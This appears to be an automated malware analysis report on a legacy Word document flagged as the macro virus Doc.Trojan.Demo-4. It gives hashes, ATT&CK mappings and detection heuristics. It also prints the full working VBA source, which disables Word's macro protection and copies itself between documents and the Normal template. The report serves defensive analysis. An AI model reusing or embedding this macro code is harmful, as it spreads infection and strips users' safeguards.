Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d431f4418aa8a813…

MALICIOUS

Office (OLE)

157.0 KB Created: 2003-04-04 11:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9712aff0c70f61710c9264a2b881f336 SHA-1: 62ed612551c2669d1772b2db74d0c5e8e75ab454 SHA-256: d431f4418aa8a813b31c5c4ddf96c4dd2d7d005cde0fb4c0b43ff6bd1df06c8a
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The script attempts to disable macro security and infect the Normal template by exporting and importing a macro named 'Demo' to 'C:\sys.sys', indicating an attempt to establish persistence or facilitate further infection stages. The ClamAV detection 'Doc.Trojan.Demo-4' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Demo-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Demo-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1283 bytes
SHA-256: 8bda488b8505bfbfdb9c4effc3936a95d2128eab56119d828a3acd857e9e9ab5
Detection
ClamAV: Doc.Trojan.Demo-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Demo"
Sub AutoOpen()
    On Error Resume Next ' Отключение всех ошибок
    Options.VirusProtection = False ' отключение встроенной макрозащиты
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = "Demo" Then Infected = True
    Next i
    If Infected <> True Then
        ActiveDocument.VBProject.VBComponents("Demo").Export "C:\sys.sys"
        NormalTemplate.VBProject.VBComponents.Import "C:\sys.sys"
        Kill "C:\sys.sys"
    End If
    Infected = False
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Demo" Then Infected = True
    Next i
    If Infected <> True Then
        NormalTemplate.VBProject.VBComponents("Demo").Export "C:\sys.sys"
        ActiveDocument.VBProject.VBComponents.Import "C:\sys.sys"
        Kill "C:\sys.sys"
    End If
End Sub
Sub AutoNew()
    AutoOpen
End Sub